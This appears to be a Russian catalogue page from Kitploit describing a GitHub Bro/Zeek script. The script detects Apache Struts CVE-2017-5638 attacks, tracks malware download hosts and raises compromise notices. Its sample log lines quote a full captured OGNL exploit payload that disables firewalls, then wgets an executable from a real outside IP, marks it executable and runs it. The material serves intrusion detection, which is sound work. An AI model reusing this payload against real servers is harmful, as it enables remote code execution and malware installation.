Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-5638_struts — обнаружение разведки и компрометации Apache Struts | Kitploit
Инструменты/GitHubGitHub/initconf/cve-2017-5638_struts
Анализ уязвимостейЭксплуатацияСетевая безопасностьАнализ вредоносных программРазведка угрозОбнаружение Вторжений
GitHubinitconf/cve-2017-5638_struts

CVE-2017-5638_struts

обнаружение разведки и компрометации Apache Struts

Репозиторий
828 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Я расширил скрипт Scott Campbell, сделав его более сложным :)

В то время как HTTP_StrutsAttack блокирует 100% разведки, всё ещё оставалась ничтожная вероятность, что если сканер находит уязвимую систему, даже если мы заблокируем сканер, уязвимая система всё равно может выполнить wget, включённый в HTTP-запрос, и запустить вредоносное ПО. Поскольку мы не блокируем IP-адрес загрузки вредоносного ПО в URL wget, который почти всегда отличается от IP разведки.

Поэтому расширенный скрипт также извлекает IP-адрес загрузки вредоносного ПО.

  1. Создаются следующие уведомления:

    root@kitploit:~
     redef enum Notice::Type += {
             Attempt,
             MalwareURL,
             HostileDomainLookup,
             MalwareURLClick,
             FileDownload,
             Compromise,
     };
    
  • Теперь этот скрипт извлекает URL wget из Attempt, и если URL содержит домен (или CNAME), скрипт далее отслеживает IP-адреса хоста вредоносного ПО и следит за активностью.

  • Если URL wget обнаружен в http, мы генерируем уведомление MalwareURLClick

  • Далее уведомления FileDownload и Compromise.

  • Этот скрипт также кластеризован.

Я запускал его в течение 24 часов, и всё выглядит стабильно в отношении скрипта. Я всё ещё уверен, что могут быть некоторые слабые места в обнаружении. Так что не стесняйтесь модифицировать и сообщите мне тоже.

Удивительно, но, в отличие от предыдущих раз, я не наблюдаю огромного количества сканеров Struts. Я вижу в диапазоне ~20 в день вместо ~1000 в день.

Вот примеры уведомлений:

1489228734.171565 CbVq832QovIwAQddf2 1.24.191.108 65000 131.243.X.Y 80 - - - tcp Struts::Attempt CVE-2017-5638/Struts attack from 1.24.191.108 seen: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} - 1.24.191.108 131.243.X.Y 80 - worker-5 Notice::ACTION_LOG 3600.000000 F - -- - -

1489237401.399275 C90k4o1Zrn8D7vaXoe 124.117.244.34 49728 128.3.Y.Z 80 - - - tcp Struts::MalwareURL Struts Hostile URLs seen in recon attempt 124.117.244.34 to 128.3.Y.Z with URL [http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;] - 124.117.244.34 128.3.Y.Z 80 - worker-13 Notice::ACTION_LOG 3600.000000 F - - - - -

1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::MalwareURLClick Struts Hostile URL seen 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 60.000000 F - - - - -

1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::Compromise Struts compromise: 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F - - - - -

1489240940.206456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 Frx9jZ1JkcrsVtgOkg application/x-executable http://121.42.249.245:1996/tcp/xhx tcp Struts::FileDownload http://121.42.249.245:1996/tcp/xhx http://121.42.249.245:1996/tcp/xhx 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F

Скачать инструмент